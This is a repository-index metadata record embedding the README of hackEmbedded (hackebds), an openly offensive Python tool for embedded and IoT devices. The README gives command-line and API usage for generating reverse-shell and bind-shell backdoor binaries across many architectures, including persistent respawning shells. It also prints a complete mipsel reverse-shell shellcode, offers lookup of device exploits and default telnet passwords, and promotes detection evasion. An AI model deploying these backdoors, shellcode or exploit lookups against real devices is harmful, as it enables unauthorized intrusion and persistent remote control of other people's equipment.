{"id":26257550,"url":"https://github.com/doudoudedi/hackembedded","last_synced_at":"2025-04-06T16:13:13.462Z","repository":{"id":43167208,"uuid":"485661878","full_name":"doudoudedi/hackEmbedded","owner":"doudoudedi","description":"This tool is used for backdoor,shellcode generation,Information retrieval and POC arrangement for various architecture devices","archived":false,"fork":false,"pushed_at":"2024-02-29T03:14:52.000Z","size":76040,"stargazers_count":167,"open_issues_count":4,"forks_count":30,"subscribers_count":4,"default_branch":"main","last_synced_at":"2024-04-29T17:49:21.734Z","etag":null,"topics":["cve","exploit","iot","linux","poc","python","reverse-shell","security"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/doudoudedi.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2022-04-26T06:32:41.000Z","updated_at":"2024-04-13T20:22:05.000Z","dependencies_parsed_at":"2023-12-12T15:51:06.479Z","dependency_job_id":null,"html_url":"https://github.com/doudoudedi/hackEmbedded","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/doudoudedi%2FhackEmbedded","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/doudoudedi%2FhackEmbedded/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/doudoudedi%2FhackEmbedded/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/doudoudedi%2FhackEmbedded/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/doudoudedi","download_url":"https://codeload.github.com/doudoudedi/hackEmbedded/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247509237,"owners_count":20950232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve","exploit","iot","linux","poc","python","reverse-shell","security"],"created_at":"2025-03-13T21:21:10.635Z","updated_at":"2025-04-06T16:13:13.433Z","avatar_url":"https://github.com/doudoudedi.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# hackebds\n\n![PyPI - Wheel](https://img.shields.io/pypi/wheel/hackebds)![PyPI - Python Version](https://img.shields.io/pypi/pyversions/pwntools)\n[![Downloads](https://static.pepy.tech/badge/hackebds)](https://pepy.tech/project/hackebds)\n![PyPI - Downloads](https://img.shields.io/pypi/dm/hackebds)\n\n\n:link:[中文readme](https://github.com/doudoudedi/hackEmbedded/blob/main/readme_cn.md)\n\n## foreword\n\n\u003eIn the process of penetration and vulnerability mining of embedded devices, many problems have been encountered. One is that some devices do not have telnetd or ssh services to obtain an interactive shell，Some devices are protected by firewall and cannot be connected to it in the forward direction Reverse_shell is required, and the other is that memory corruption vulnerabilities such as stack overflow are usually Null bytes are truncated, so it is more troublesome to construct reverse_shellcode, so this tool was developed to exploit the vulnerability. This tool is developed based on the PWN module and currently uses the python2 language，**Has been updated to python3**\n\n## fuction\n\n\nThis tool is embedded in the security test of the device. There are two main functions:\n\n1. Generate **backdoor programs** (only ELF) of various architectures. The backdoor program is packaged in shellless pure shellcode and is smal，Pure static backdoor .**Armv5, Armv7, Armv8, mipsel, mips，mips64，mipsel64，powerpc, powerpc64，sparc,sparc64,mipsn32  are now supported, and they are still being updated** (PS:bash support is added to the reverse shell after version 0.3.1). If the backdoor of the reverse shell is generated with the - power parameter, the reverse shell will continue to be continuously generate on the target machine)\n2. Generate **reverse_shell shellcode** (only linux) of various architectures during the exploit process, and no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. **Armv5, Armv7, Armv8, mipsel, mips, mips64, mipsel64, powerpc, powerpc64,sparc are now supported, and they are still being updated**\n3. Generate bind of various architectures bind_Shell(only ELF) file, -power can persistent bind_shell（ If you need to use  -power parameter, you can specify the bash shell, and please do not hang the process in the background to prevent data redirection errors）\n4. Sort out the exploitable vulnerability POC or EXP of the embedded device, and search and output the basic information and POC of the device model in use: Function of equipment, Architecture of equipment,Device CPU manufacturer,Device CPU model,WEB service program of the device, and so on\n5. Support command line generation backdoor and shell code, Strong anti hunting ability,characterized by light, small, efficient and fast\n\n\n## install\n\n```\nuse docker:\ndocker pull doudoudedi/hackebds:3.8\n(This version will encounter issues with generating shellcode in armv5, and will be fixed in the next version)\n```\n\n\nJust use pip to install, if the installation fails, try to use sudo to install\n\n```\nUse pip install:\nsudo pip install -U hackebds\n\nlocal install:\ngit clone https://github.com/doudoudedi/hackEmbedded\nsudo ./start.sh\n```\n\n（If you want this tool to run on a MacOS system, you need to include python/bin in the bashrc environment variable）\n\n```\necho 'export PATH=\"/Users/{you id}/Library/Python/{your installed python}/bin:$PATH\"'\u003e\u003e ~/.bashrc\n```\n\n![image-20221125095653018](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221125095653018.png)\n\n\n![image-20221121142622451](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221121142622451.png)\n\n#### Instructions for use\n\n![image-20221118202002242](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221118202002242.png)\n\nPlease install the corresponding binutils environment before use\nexpample:\n\n```\nUbuntu（debian）:\n  apt search binutils | grep arm（You can replace it here， if not please execute \"apt update\" first）\n  apt install binutils-arm-linux-gnueabi/hirsute\n MacOS:\n \t https://github.com/Gallopsled/pwntools-binutils\n \t brew install https://raw.githubusercontent.com/Gallopsled/pwntools-binutils/master/osx/binutils-$ARCH.rb\n```\n\n1. Use the command line to generate the backdoor file name, shellcode, bindshell, etc\n\n   ![image-20221206180431454](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221206180431454.png)\n\n   Redesigned the relationship between model and arch, enabled the regeneration backdoor to directly specify the device model, but the model needs to match the name listed in the - l parameter\n\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 9999 -model DIR-816 -res reverse_shell_file\n   or\n   hackebds -lhost 127.0.0.1 -lport 9999 -model DIR-816 -res reverse_shell_file\n   ```\n\n   ![image-20230710112652819](https://myblog-1257937445.cos.ap-nanjing.myqcloud.com/img/image-20230710112652819.png)\n\n   \n\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 8081 -arch armelv7 -res reverse_shellcode\n   or\n   hackebds -lhost 127.0.0.1 -lport 9999 -arch mipsel -res reverse_shellcode\n   ```\n\n   ![image-20221102181217933](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221102181217933.png)\n\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 8081 -arch armelv7 -res reverse_shell_file\n   or\n   hackebds -lhost 127.0.0.1 -lport 8081 -arch armelv7 -res reverse_shell_file\n   ```\n\n   By default, the reverse shell backdoor is created using sh. If bash is required (PS: here, the bash command needs to exist on the target device)\n\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 8081 -arch armelv7 -res reverse_shell_file -shell bash\n   or \n   hackebds -lhost 127.0.0.1 -lport 8081 -arch armelv7 -res reverse_shell_file -shell bash\n   ```\n\n   If you need to generate a backdoor and constantly create reverse shells (the CPU occupied by the test is about% 8)\n\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 8081 -arch armelv7 -res reverse_shell_file -shell bash -power\n   or\n   hackebds -lhost 127.0.0.1 -lport 8081 -arch armelv7 -res reverse_shell_file -shell bash -power\n   ```\n   If you need to create a reverse shell every 5 seconds\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 9999 -arch mipsel -res reverse_shell_file -power -sleep 5\n   or\n   hackebds -lhost 127.0.0.1 -lport 9999 -arch mipsel -res reverse_shell_file -power -sleep 5\n   ```\n\n   ![image-20221102183017775](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221102183017775.png)\n\n   ```\n   hackebds -bind_port 8080 -passwd 1234 -arch mips -model DIR-823 -res bind_shell\n   ```\n\n   Create bind_shell to monitor the shell as sh, -power fuction can give -shell bash\t\n\n   ```\n   hackebds -bind_port 8081 -arch armelv7 -res bind_shell -passwd 1231 -power\n   ```\n\n   The bind_shell process will not stop after being disconnected, and supports repeated connections (currently this function is not supported by powerpc and sparc series)\n\n   ![image-20221102182939434](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221102182939434.png)\n\n   \n\n   Generate cmd_file function is updated. Only need to specify the - cmd parameter to generate programs for various architectures to execute corresponding commands , -envp Environment variables are separated by commas\n\n   ```\n   hackebds  -cmd \"ls -al /\" -arch powerpc  -res cmd_file\n   ```\n\n   ![image-20230106153459125](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20230106153459125.png)\n\n   The list relationship between the output model and the architecture is added to the function of generating the back door of the specified model to facilitate the user to observe and modify. The output information will be enhanced after version 0.3.5, such as (100+ device information, POC80+or so):\n   Function of equipment\n   Architecture of equipment\n   Device CPU manufacturer\n   Device CPU model\n   WEB service program of the device\n   Device default SSH service support\n   Can monitoring be realized\n   Device default telnet user password\n   Device sdk support\n   Openwrt support for devices\n   Whether the device is vulnerable\n   POC output\n\n   ```\n   hackebds -l\n   ```\n\n   ![image-20230213151548871](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20230213151548871.png)\n\n   Added retrieval of device information, using - s to search for the - model parameter. This search is fuzzy and case insensitive. Try to use lowercase when inputting, and finally output the device information with the highest matching degree with the input（The introduction of EXP and POC in version 0.3.7)\n\n   If the following error occurs\n\n   hackebds: error: argument -model: expected one argument\n\n   Please set all parameters to lowercase or lowercase mixed with uppercase. I guess it is due to the conflict between python and bash in the interpretation of uppercase and lowercase letters\n\n   ```\n   hackebds -model ex200 -s\n   ```\n\n   If the following warning occurs during command output\n\n   /usr/local/lib/python3.8/dist-packages/fuzzywuzzy/fuzz.py:11: UserWarning: Using slow pure-python SequenceMatcher. Install python-Levenshtein to remove this warning\n     warnings.warn('Using slow pure-python SequenceMatcher. Install python-Levenshtein to remove this warning')\n\n   If the following warning occurs during command output, you can use the following command to install python-levenshtein. After installation, the command retrieval speed can be increased by about 4 times\n\n   ```\n   pip install python-levenshtein\n   ```\n\n   ![image-20230213105520663](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20230213105520663-20230213151846373.png)\n\n   The POC corresponding to the generated device can use - p or -- poc, which may be python scripts, commands, etc., and may need to be modified by yourself\n\n   ```\n   hackebds -model ex200 -p\n   ```\n\n   ![image-20230213105925356](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20230213105925356.png)\n\n   Added search for CVE\n\n   ```\n   hackebds -CVE CVE-2019-17621\n   ```\n\n   ![image-20230530172408297](https://myblog-1257937445.cos.ap-nanjing.myqcloud.com/img/image-20230530172408297.png)\n\n   \n\n   \n\n   If a vulnerability is found in the test and you want to add the basic information of a new device to this tool, you can use the - add function for POC files or \"/tmp/model_tree_info/\" The format of the directory directory of the new device under the info/directory can refer to the standard generated format. After the insertion, you can use the tool search and POC generation functions，Finally, if you need to fill in the POC file information, you can put it in \"/tmp/model_tree_info/xxx/POC\" directory will be read if retrieved again\n\n   ```\n   hackebds -add\n   ```\n\n   ![image-20230213111024854](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20230213111024854.png)\n\n   If there are device information errors, POC errors, or you want to integrate your collected device information with vulnerabilities, please contact me doudoudedi233@gmail.com\n\n   \n\n3. Generate backdoor programs of various architectures, encapsulate pure shellcode, and successfully connect to the shell\n\n```\n\u003e\u003e\u003e from hackebds import *\n\u003e\u003e\u003e mipsel_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e aarch64_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e armelv5_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e armelv7_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e armebv5_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e armebv7_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips64_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips64el_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e x86el_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e x64el_backdoor(reverse_ip, reverse_port)\n\u003e\u003e\u003e sparc32.sparc_backdoor(reverse_ip, reverse_port)#big endian\n\u003e\u003e\u003e sparc64.sparc_backdoor(reverse_ip, reverse_port)#big endian\n\u003e\u003e\u003e powerpc_info.powerpc_backdoor(reverse_ip, reverse_port)\n\u003e\u003e\u003e powerpc_info.powerpcle_backdoor(reverse_ip, reverse_port)\n\u003e\u003e\u003e powerpc_info.powerpc64_backdoor(reverse_ip, reverse_port)\n\u003e\u003e\u003e powerpc_info.powerpc64le_backdoor(reverse_ip, reverse_port)\n\u003e\u003e\u003e x86_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e x64_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e armelv7_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e aarch64_ bind_ shell(listen_port, passwd)\n\u003e\u003e\u003e mips_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e mipsel_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e sparc32.sparc_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e powerpc_info.powerpc_bind_shell(listen_port, passwd)\n```\n\n（Note that the maximum password length is 4 characters for x86（32bits） and 8 characters for x64（64bits））\n\n```\n\u003e\u003e\u003e mipsel_backdoor(\"127.0.0.1\",5566)\n[+] reverse_ip is: 127.0.0.1\n[+] reverse_port is: 5566\n[*] waiting 3s\n[+] mipsel_backdoor is ok in current path ./\n\u003e\u003e\u003e\n```\n\n![image-20221028144512270](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221028144512270.png)\n\n```\n\u003e\u003e\u003e from hackebds import *\n\u003e\u003e\u003e x86_bind_shell(4466,\"doud\")\n[+] bind port is set to 4466\n[+] passwd is set to 'doud'\n0x0000000064756f64\n[*] waiting 3s\n[+] x86_bind_shell is ok in current path ./\n\u003e\u003e\u003e\n```\n\n![image-20221028143802937](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221028143802937.png)\n\nThen connect to the port bound to the device (password exists)\n\n![image-20221028144136069](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221028144136069.png)\n\n2. Generates the use-back shellcode (no free) null bytes corresponding to various architectures\n\n```\n\u003e\u003e\u003e from hackebds import *\n\u003e\u003e\u003e mipsel_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e aarch64_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e armelv5_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e armelv7_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e armebv5_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e armebv7_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips64_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips64el_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e android_aarch64_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e x86el_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e x64el_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e powerpc_info.ppc_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e powerpc_info.ppcle_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e powerpc_info.ppc64_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e powerpc_info.ppc64le_reverse_sl(reverse_ip,reverse_port)\n```\n\nexample:\n\n```\n\u003e\u003e\u003e from hackebds import *\n\u003e\u003e\u003e shellcode=mipsel_reverse_sl(\"127.0.0.1\",5566)\n[+] No NULL byte shellcode for hex(len is 264):\n\\xfd\\xff\\x19\\x24\\x27\\x20\\x20\\x03\\xff\\xff\\x06\\x28\\x57\\x10\\x02\\x34\\xfc\\xff\\xa4\\xaf\\xfc\\xff\\xa5\\x8f\\x0c\\x01\\x01\\x01\\xfc\\xff\\xa2\\xaf\\xfc\\xff\\xb0\\x8f\\xea\\x41\\x19\\x3c\\xfd\\xff\\x39\\x37\\x27\\x48\\x20\\x03\\xf8\\xff\\xa9\\xaf\\xff\\xfe\\x19\\x3c\\x80\\xff\\x39\\x37\\x27\\x48\\x20\\x03\\xfc\\xff\\xa9\\xaf\\xf8\\xff\\xbd\\x27\\xfc\\xff\\xb0\\xaf\\xfc\\xff\\xa4\\x8f\\x20\\x28\\xa0\\x03\\xef\\xff\\x19\\x24\\x27\\x30\\x20\\x03\\x4a\\x10\\x02\\x34\\x0c\\x01\\x01\\x01\\xf7\\xff\\x85\\x20\\xdf\\x0f\\x02\\x24\\x0c\\x01\\x01\\x01\\xfe\\xff\\x19\\x24\\x27\\x28\\x20\\x03\\xdf\\x0f\\x02\\x24\\x0c\\x01\\x01\\x01\\xfd\\xff\\x19\\x24\\x27\\x28\\x20\\x03\\xdf\\x0f\\x02\\x24\\x0c\\x01\\x01\\x01\\x69\\x6e\\x09\\x3c\\x2f\\x62\\x29\\x35\\xf8\\xff\\xa9\\xaf\\x97\\xff\\x19\\x3c\\xd0\\x8c\\x39\\x37\\x27\\x48\\x20\\x03\\xfc\\xff\\xa9\\xaf\\xf8\\xff\\xbd\\x27\\x20\\x20\\xa0\\x03\\x69\\x6e\\x09\\x3c\\x2f\\x62\\x29\\x35\\xf4\\xff\\xa9\\xaf\\x97\\xff\\x19\\x3c\\xd0\\x8c\\x39\\x37\\x27\\x48\\x20\\x03\\xf8\\xff\\xa9\\xaf\\xfc\\xff\\xa0\\xaf\\xf4\\xff\\xbd\\x27\\xff\\xff\\x05\\x28\\xfc\\xff\\xa5\\xaf\\xfc\\xff\\xbd\\x23\\xfb\\xff\\x19\\x24\\x27\\x28\\x20\\x03\\x20\\x28\\xa5\\x03\\xfc\\xff\\xa5\\xaf\\xfc\\xff\\xbd\\x23\\x20\\x28\\xa0\\x03\\xff\\xff\\x06\\x28\\xab\\x0f\\x02\\x34\\x0c\\x01\\x01\\x01\n```\n\n## chips and architectures\n\nTests can leverage chips and architectures\n\nMips:\nMIPS 74kc V4.12 big endian,\nMIPS 24kc V5.0  little endian (Ralink SoC) like MediaTek MT7621\nIngenic Xburst V0.0  FPU V0.0  little endian\n\nArmv7:\nAllwinner(全志)V3s\n\nArmv8:\nQualcomm Snapdragon 660\nBCM2711\n\nPowerpc, sparc: qemu\n\n\n## :beer:enjoy hacking\n\n\n## updating\n\n 2022.4.19 Added support for aarch64 null-byte reverse_shellcode\n\n 2022.4.30 Reduced amount of code using functions and support python3\n\n 2022.5.5 0.0.8 version Solved the bug that mips_reverse_sl and mipsel_reverse_sl were not enabled, added mips64_backdoor, mips64_reverse_sl generation and mips64el_backdoor, mips64el_reverse_sl generation\n\n 2022.5.21 0.0.9 version changed the generation method of armel V5 backdoor and added the specified generation of riscv-v64 backdoor\n\n 2022.6.27 0.1.0 Added Android backdoor generation\n\n 2022.10.26 0.1.5 Fixed some problems and added some automatic generation functions of bindshell specified port passwords\n\n 2022.10.27 0.1.6 Add support armv7el_bind_shell(2022.10.27)\n\n 2022.11.1 Removed the generation sleep time of shellcode, and added mips_ bind_ Shell, reverse of x86 and x64 small end_ shell_ Backdoor, the mips that are expected to be interrupted by mips_ bind_ Shell, which solves the error of password logic processing in the bindshell in mips\n\n 2022.11.2 Joined aarch64_ bind_ shell\n 2022.11.2 Support command line generation backdoor and shell code, characterized by light, small, efficient and fast\n\n 2022.12.6 0.2.8 Add sparc_bind_shell \u0026\u0026 powerpc_bind_shell ，fix some bug\n\n 2022.12.26 0.2.9 Added the program function of generating specified commands, and added executable permissions after generating files\n\n 2023.1.6 0.3.0 repaired cmd_ The file generates the function bug of executing the specified command program, and adds the model -\u003earch list, Android bind_ Shell file\n\n 2023.1.16 0.3.1 Added bash reverse_ Shell. At present, this tool only supports sh and bash. The - l function is added to list the relationship between device model and architecture, and the - power function is added to generate a more powerful reverse_ shell_ File, which realizes the continuous creation of reverse shell links without killing the program. Currently, the - power function only supports reverse_ shell_ file\n\n 2023.1.29 0.3.3 -The power function adds support for bind_shell, bind_shell is more stable, and fixes some bugs in the execution of bind_shell and cmd_file files of the aarch64 architecture\n\n2023.3.7 0.3.6 Added support for the mipsn32 architecture (this architecture may be encountered in devices such as zyxel firewalls)\n\n2023.5.30 add the retrieval of CVE and output the content of EXP and POC files in the device information\n\n2023.11.11 Fixed the issue of armv5 series backdoors not being able to generate shells in Vitogate_300  The rear doors  are operating normally，Simplified reverse_ Command parameters such as IP can be used with - lhost and - lport, Added some device vulnerabilities\n\n## Problems to be solved\n\nSupport the backend of the loongarch64 architecture and the generation of the bind_shell program (binutils has been integrated into the mainline, but cannot be installed directly through apt)\n\nImprove the generation of power_bind_shell backdoors of powerpc and sparc series\n\nAdd anti-kill function for backdoor programs\n\n\n\n## vul fix\n\n\nCVE-2021-29921 The tool is a complete client program. This vulnerability will not affect the use of the tool. If you want to fix it, please run the tool in python 3.9 and above\n\nCVE-2022-40023 DOS_attack pip install -U  mako (The vulnerability does not apply to this tool)\n\nCVE-2021-20270 DOS_attack pip install -U  pygments (The vulnerability does not apply to this tool)\n\n 0.2.5 Version Repair directory traversal in the specified model\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdoudoudedi%2Fhackembedded","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdoudoudedi%2Fhackembedded","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdoudoudedi%2Fhackembedded/lists"}